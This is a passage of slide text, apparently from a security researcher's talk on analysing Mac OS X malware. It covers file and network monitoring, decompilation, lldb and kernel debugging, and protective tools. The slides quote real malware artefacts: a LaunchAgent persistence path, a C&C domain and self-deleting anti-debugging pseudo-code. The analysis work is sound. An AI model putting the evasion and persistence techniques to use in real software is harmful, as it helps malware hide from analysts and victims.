 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
  • 34. DYNAMIC FILE I/O quickly determine binaries file-related ac/ons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh …
 chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
  • 35. NETWORK I/O gain insight into the binary's network communica/ons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
  • 36. VIRUSTOTAL SANDBOX file i/o + network i/o, and more! virustotalportal filei/o(iWorm) networki/o(iWorm) "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
  • 37. REVERSING OBJECTIVE-C understand connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
  • 38. DECOMPILATION there’s an app for that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
  • 39. DEBUGGING using lldb; os x’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
  • 40. DEBUGGING DETECTION os x an/-debugging techniques call _getpid mov [rbp+var_34], eax mov [rbp+var_2D0], 288h lea rdi, [rbp+var_40] lea rdx, [rbp+var_2C8] lea rcx, [rbp+var_2D0] mov esi, 4 xor r8d, r8d xor r9d, r9d call _sysctl mov eax, [rbp+var_2A8] test ah, 8 jz short notDebugged mov rdi, [rbx] call _remove //debugger flag #define P_TRACED 0x00000800 //management info base (‘mib’) mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); //get process info sysctl(mib, sizeof(mib)/sizeof(*mib), &info, &size, NULL, 0); //check flags to determine if debugged if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //process is debugged!
 //self delete remove(path2Self); } anti-debug(mackeeperexploiter) processflags(debugged) anti-debugpseudo-code “Analyzing the Anti-Analysis Logic, of an Adware Installer"
  • 41. ENABLING KERNEL DEBUGGING for analyzing kernel extensions and rootkit components # nvram boot-args="debug=0x141 pmuflags=1 -v" enabledebugging disableSIP(inrecoverymode;⌘+r) installappropriate‘kerneldebugkit’ # lldb (lldb) target create /Library/Developer/KDKs/ KDK_10.11.1_15B42_.kdk/System/Library/Kernels/kernel startdebugger(lldb) (lldb) kdp-remote <VM IP addr> Version: Darwin Kernel Version 15.0.0: Wed Aug 26 16:57:32 PDT 2015; root:xnu-3247.1.106~1/ RELEASE_X86_64; 
 
 (lldb) image list [ 0] 37BC582F-8BF4-3F65-AFBB-ECF792060C68 0xffffff8007000000 /Library/Developer/KDKs/ KDK_10.11_15A284.kdk/System/Library/Kernels/kernel connectanddebug “Kernel Debugging a Virtualized 
 OS X Image"
  • 42. PART 0X5: HEALTH & HAPPINESS how do i protect my personal macs?
  • 43. APPLE'S OS X SECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -:m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
  • 44. only 4 launch items no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
  • 45. OS X LOCKDOWN hardens OS X & reduces its anack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
  • 46. OS X SECURITY TOOL LinleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
  • 47. MY PERSONAL SECURITY TOOLS Objec/ve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 50. CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learned about: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis 'focusonsession'
 today@2:10PM,westroom2016
  • 51. credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 - thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources